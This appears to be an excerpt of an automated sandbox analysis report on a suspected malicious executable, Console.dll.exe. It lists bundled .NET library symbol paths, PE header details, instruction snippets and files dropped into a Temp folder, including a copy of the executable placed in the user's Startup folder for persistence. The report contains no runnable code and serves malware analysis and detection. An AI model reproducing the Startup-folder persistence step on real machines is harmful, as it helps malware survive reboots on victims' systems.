            Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.Net.Security.ni.pdb= source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb^ source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: Microsoft.CSharp.ni.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: System.Text.Encodings.Web.ni.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdbSHA256 source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Collections.Concurrent.ni.pdb source: Console.dll.exe
            Source: Binary string: C:\projects\websocket-sharp\websocket-sharp\obj\Release\netstandard2.0\websocket-sharp.pdb source: Console.dll.exe, 00000000.00000002.1629988218.0000000009582000.00000002.00000001.01000000.00000011.sdmp, Console.dll.exe, 00000007.00000002.2002778673.00000000091D2000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: System.Diagnostics.Process.ni.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Private.Uri.ni.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdbSHA256^ source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdb source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net8.0-windows\Microsoft.VisualBasic.Core.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdb source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdbSHA256 source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdbSHA256 source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256;s source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.Linq.Expressions.ni.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Console.dll.exe
            Source: Binary string: System.Memory.ni.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdb source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: System.IO.Compression.ni.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdb source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: System.Security.Cryptography.ni.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdbSHA256U source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdbSHA256| source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.ComponentModel.TypeConverter.ni.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb; source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256CM source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: System.Console.ni.pdbP source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Net.WebSockets.ni.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256o source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Console.ni.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdbSHA256 source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb; source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: System.Net.Http.ni.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Memory.ni.pdbc source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: Console.dll.exe, System.Buffers.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdbSHA256 source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdbSHA256 source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdb source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdbSHA256 source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Console.dll.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Console.dll.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Console.dll.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Console.dll.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Console.dll.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: System.Runtime.Intrinsics.dll.0.drStatic PE information: 0xCFC90A77 [Wed Jun 19 21:45:27 2080 UTC]
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0141B5D0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,GetCurrentProcess,VirtualFree,VirtualFree,GetCurrentProcess,VirtualFree,GetCurrentProcess,VirtualProtect,0_2_0141B5D0
            Source: Console.dll.exeStatic PE information: section name: .CLR_UEF
            Source: Console.dll.exeStatic PE information: section name: .didat
            Source: Console.dll.exeStatic PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_05AA8770 pushfd ; iretd 0_2_05AA8771
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0CB4266C pushad ; iretd 0_2_0CB4266D
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0CB4AF11 pushad ; iretd 0_2_0CB4AF12
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0CB491EC push esp; retf 0_2_0CB491ED
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0CB491E8 push esp; retf 0_2_0CB491E9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_085CD9A4 push ebx; ret 7_2_085CD9A5
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_085C6051 push ebx; ret 7_2_085C6052
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_085CD288 push eax; retf 7_2_085CD289
            Source: System.Runtime.Numerics.dll.0.drStatic PE information: section name: .text entropy: 6.897846164158751
            Source: System.Collections.Immutable.dll.0.drStatic PE information: section name: .text entropy: 6.82698069539853
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Newtonsoft.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.X509Certificates.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Intrinsics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WindowsBase.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Csp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.CodePages.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Formatters.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.HttpUtility.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Console.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.ZipFile.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Dataflow.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Ping.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.AppContext.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Quic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.DispatchProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ValueTuple.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.OpenSsl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.ResourceManager.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceModel.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.EventBasedAsync.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.Lightweight.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Handles.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Concurrent.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Queryable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.SqlServer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tools.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Dynamic.Runtime.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Mail.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Loader.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.TypeConverter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.HttpListener.dllJump to dropped file
